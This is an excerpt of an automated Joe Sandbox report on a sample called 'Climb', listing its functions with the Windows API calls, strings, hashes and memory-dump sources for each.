Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c68c118c5bf11b54d100981cb128a9a19f96600d5a7156241d9e1793d0e7b2b0
Instruction ID: 404ac47b5083da791a0e8b71f7030996e53299976a0df94d7f54f8485858331d
Opcode Fuzzy Hash: c68c118c5bf11b54d100981cb128a9a19f96600d5a7156241d9e1793d0e7b2b0
Instruction Fuzzy Hash: 97F06230A00208BBDB15EFE4DC49BADBFF6EF44752F0001A8F805A61A0DB749E41DB95

Function 00A6663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A6665C
FreeLibrary.KERNEL32(00000000,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6666E

Strings

kernel32.dll, xrefs: 00A66642
Wow64DisableWow64FsRedirection, xrefs: 00A66656

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 83fcf65897035b9b54cd5c3a0c899cef017007a9f8816fdbc09fd0149e30ac6f
Instruction ID: 30c14269fbc64a32ffda9154e55d0af331a2f4321b643f37b7f7b70c99981ce5
Opcode Fuzzy Hash: 83fcf65897035b9b54cd5c3a0c899cef017007a9f8816fdbc09fd0149e30ac6f
Instruction Fuzzy Hash: EEE01D3960153257921717A5FC0CB7E657A9F92F16B050315FD04D6154DFA4CD03C5E9

Function 00A66607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A66622
FreeLibrary.KERNEL32(00000000,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66635

Strings

kernel32.dll, xrefs: 00A66609
Wow64RevertWow64FsRedirection, xrefs: 00A6661C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 0801c69c3d2175db000b7352b8c5424967281b9d006b5ab65d09103bdcdd818e
Instruction ID: b0e64307c53ebb3393f27427431b45dd656e8d3f9f5df103b31de826aa17b4cf
Opcode Fuzzy Hash: 0801c69c3d2175db000b7352b8c5424967281b9d006b5ab65d09103bdcdd818e
Instruction Fuzzy Hash: BFD0123961297267422767A5BC189AE6A269E95B113050515B904B6114CF60CD02C5DD

Function 00AD3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD35C4
DeleteFileW.KERNEL32(?), ref: 00AD3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AD365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AD367F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: e113edc8e14377ca126b06876a783d053e8ce4cbc48202d6b22a0771ec5163b3
Instruction ID: 1c85ff0d4ce9686ae13de2c5f75f7ec351b702a2a16f1031248bd67a0363c8c0
Opcode Fuzzy Hash: e113edc8e14377ca126b06876a783d053e8ce4cbc48202d6b22a0771ec5163b3
Instruction Fuzzy Hash: CEB141B2D00119ABDF11EBA4CD85EDFBBBDEF48314F0040A6F50AA7251EA349B45CB61

Function 00AEADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00AEAE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AEAE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AEAEC8
CloseHandle.KERNEL32(?), ref: 00AEB09D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 47fc4f4d5e732f9e94aa5add8d8e4c8db1650dee7322675c311cfc9b71debbe9
Instruction ID: 51b99ae0adbef01625b2fbd0681b621f204e8f75ae3de9ad74a3cec7f520f049
Opcode Fuzzy Hash: 47fc4f4d5e732f9e94aa5add8d8e4c8db1650dee7322675c311cfc9b71debbe9
Instruction Fuzzy Hash: 5EA1CE75A00300AFE720DF28C986F2BB7E5AF44710F14881DF5A99B292DB71EC41CB92

Function 00AEC429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6B329: _wcslen.LIBCMT ref: 00A6B333

Part of subcall function 00AED3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AEC10E,?,?), ref: 00AED415
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED451
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4C8
Part of subcall function 00AED3F8: _wcslen.LIBCMT ref: 00AED4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AEC505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AEC560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AEC5C3
RegCloseKey.ADVAPI32(?,?), ref: 00AEC606
RegCloseKey.ADVAPI32(00000000), ref: 00AEC613

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 71ead8150a62ca798058d474fc617d1896b6a7d52e748091fa9571ad077f4e22
Instruction ID: 53be60f807ee9b2964240d9bba4d90b32c8cbd6bf43fd6fdced0e0af823cf9b1
Opcode Fuzzy Hash: 71ead8150a62ca798058d474fc617d1896b6a7d52e748091fa9571ad077f4e22
Instruction Fuzzy Hash: BE619271108281AFD714DF15C590E2ABBF5FF84318F54855CF49A8B2A2DB31ED46CBA1

Function 00ACED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ACD7CD,?), ref: 00ACE714

Part of subcall function 00ACE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ACD7CD,?), ref: 00ACE72D

Part of subcall function 00ACEAB0: GetFileAttributesW.KERNEL32(?,00ACD840), ref: 00ACEAB1

lstrcmpiW.KERNEL32(?,?), ref: 00ACED8A
MoveFileW.KERNEL32(?,?), ref: 00ACEDC3
_wcslen.LIBCMT ref: 00ACEF02
_wcslen.LIBCMT ref: 00ACEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00ACEF67

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: a1c771cd2bd90181d36be8201218810e1bca5be4f6883916482b91dcd48264c5
Instruction ID: d3048f3af61d75c0fe9c9dd6f8bef835726af83354c5fe74dc0158071cd2ae44
Opcode Fuzzy Hash: a1c771cd2bd90181d36be8201218810e1bca5be4f6883916482b91dcd48264c5
Instruction Fuzzy Hash: C45150B25083859FC725EB94D981EDBB3ECEF84340F40092EF689D7151EF31A6888766

Function 00AC9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AC9534
VariantClear.OLEAUT32 ref: 00AC95A5
VariantClear.OLEAUT32 ref: 00AC9604
VariantClear.OLEAUT32(?), ref: 00AC9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AC96A2

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 9179073b4effce963c0eff4659e2545b40eb9ac79cf0fdc674405d91013abb57
Instruction ID: 53cc84a8b90ec82aa029ea5cbbfea7d08f03aab15be5776ff6a426687bd66f84
Opcode Fuzzy Hash: 9179073b4effce963c0eff4659e2545b40eb9ac79cf0fdc674405d91013abb57
Instruction Fuzzy Hash: 1B5139B5A00619EFCB14CF68C884EAAB7F9FF89314B168559E909DB350E730E911CF90

Function 00AD9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AD95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00AD961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AD9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AD969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AD96A4

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 8d764aaaccac0a7b46890af029e7509267fad479c423ecdbef4a39e798e2e54e
Instruction ID: e927bcd24b36f20cba63a4025d07f0effe8be873706a3db78c44b236200bcde3
Opcode Fuzzy Hash: 8d764aaaccac0a7b46890af029e7509267fad479c423ecdbef4a39e798e2e54e
Instruction Fuzzy Hash: 6A514B75A00215AFCB01DFA4C985EAEBBF5FF48314F048059E84AAB362DB35ED41DB90

Function 00AE9941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AE999D
GetProcAddress.KERNEL32(00000000,?), ref: 00AE9A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00AE9A49
GetProcAddress.KERNEL32(00000000,?), ref: 00AE9A8F
FreeLibrary.KERNEL32(00000000), ref: 00AE9AAF

Part of subcall function 00A7F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00AD1A02,?,76D1E610), ref: 00A7F9F1
Part of subcall function 00A7F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AC0354,00000000,00000000,?,?,00AD1A02,?,76D1E610,?,00AC0354), ref: 00A7FA18

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 308ddc5057c7c1e7ce6a63320e50c65d3c57851713601f7a3ff2c178cf958174
Instruction ID: 690a17c78b132258e3cf834f832eacb9b4fd47c31672b5e02ee6abb705945b78
Opcode Fuzzy Hash: 308ddc5057c7c1e7ce6a63320e50c65d3c57851713601f7a3ff2c178cf958174
Instruction Fuzzy Hash: A6515A35605245DFCB11DF69C4848AEBBF1FF09354B0481A9E80A9F362D731ED86CB91

Function 00AF75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AF766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00AF7682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AF76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00ADB5BE,00000000,00000000), ref: 00AF76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AF76FF

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: e3ca17e5fc55e2e3a4f90ca40536e53801907cf8184cdddb886a5e487ec9ee9c
Instruction ID: 4374549ebb5ea4a7c96c07cc207a1373d672bd2e113779c88a969f6ab09156bd
Opcode Fuzzy Hash: e3ca17e5fc55e2e3a4f90ca40536e53801907cf8184cdddb886a5e487ec9ee9c
Instruction Fuzzy Hash: 7C41C135A08508AFDB65DFACCC48FBD7BA5EB0A350F150224FA19EB2E0D770AD11DA50

Function 00A923C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A92433
_free.LIBCMT ref: 00A92453

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1516d330f72a6f3454d87a584f5586246d057cfb35b9cde6c1dc22f1e78bafd7
Instruction ID: 1633d7a305ba1f662ff4b57902a58e8a37a3491bb8cccdce13196f644d0f03d9
Opcode Fuzzy Hash: 1516d330f72a6f3454d87a584f5586246d057cfb35b9cde6c1dc22f1e78bafd7
Instruction Fuzzy Hash: CC419D32B00210ABDF24DF78C981B5EB7E5EF89714B1545A9E615EB291DA31ED02CB80

Function 00A619CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00A619E1
ScreenToClient.USER32(00000000,?), ref: 00A619FE
GetAsyncKeyState.USER32(00000001), ref: 00A61A23
GetAsyncKeyState.USER32(00000002), ref: 00A61A3D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: b84566f6a316ecb7ed1f5669a5c15bae224cfc3ae9ba03ecf353ce3ccd33a883
Instruction ID: 3c200784283b55dfb4de63bdadfa093c9892c9bfabf36e5ce76db73d3a67dba1
Opcode Fuzzy Hash: b84566f6a316ecb7ed1f5669a5c15bae224cfc3ae9ba03ecf353ce3ccd33a883
Instruction Fuzzy Hash: 40415C76A0410ABBDF15DFA4C844AFEBB75FB15364F24831AF429A32D0D7306A54CB91

Function 00AD42B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00AD4310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00AD4367
TranslateMessage.USER32(?), ref: 00AD4390
DispatchMessageW.USER32(?), ref: 00AD439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AD43AB

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 869eea5c04530ae9f88979e8571f2c95231f9cccaf212503b68019214636b864
Instruction ID: a29bcc4dfd6e3fa53840d3198a0e8ce8c681287eec395ed1f2ee21b4c580dd1a
Opcode Fuzzy Hash: 869eea5c04530ae9f88979e8571f2c95231f9cccaf212503b68019214636b864
Instruction Fuzzy Hash: 39319A70544345DFEB39DB7CDC49BBA3BA8AB09304F14456BD4A3CB2A0E7749485CB15

Function 00AC224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AC2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00AC230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00AC2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00AC2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00AC232F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 7ec49db86483d31db687fe13448550e7515b46e3ec94d8675a706381c76a26e6
Instruction ID: f4fca497529217d70d2107dc0c2f47110d8ad729165e5f645c43c2109252eb12
Opcode Fuzzy Hash: 7ec49db86483d31db687fe13448550e7515b46e3ec94d8675a706381c76a26e6
Instruction Fuzzy Hash: 0231AD71900219EFDB14CFA8CD89BEE3BB6EB04315F114229FA25EB2D0C770A944DB91

Function 00ADD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00ADD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADDA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00ADCC63,00000000), ref: 00ADDA37

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 4b7bfa210a182234f25910702218f9675e0964168c9d4781f042cc6f375c7fea
Instruction ID: d8b4faa72eda443922d2ad21f0de28955fe81e158cfdb047c003fb38532fb316
Opcode Fuzzy Hash: 4b7bfa210a182234f25910702218f9675e0964168c9d4781f042cc6f375c7fea
Instruction Fuzzy Hash: 5B315971604205EFDB20DFA5D894EAFBBF8EB04350B10842EE546D6650D731EE45DB60

Function 00AF61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AF61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00AF623C
_wcslen.LIBCMT ref: 00AF624E
_wcslen.LIBCMT ref: 00AF6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00AF62B5

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
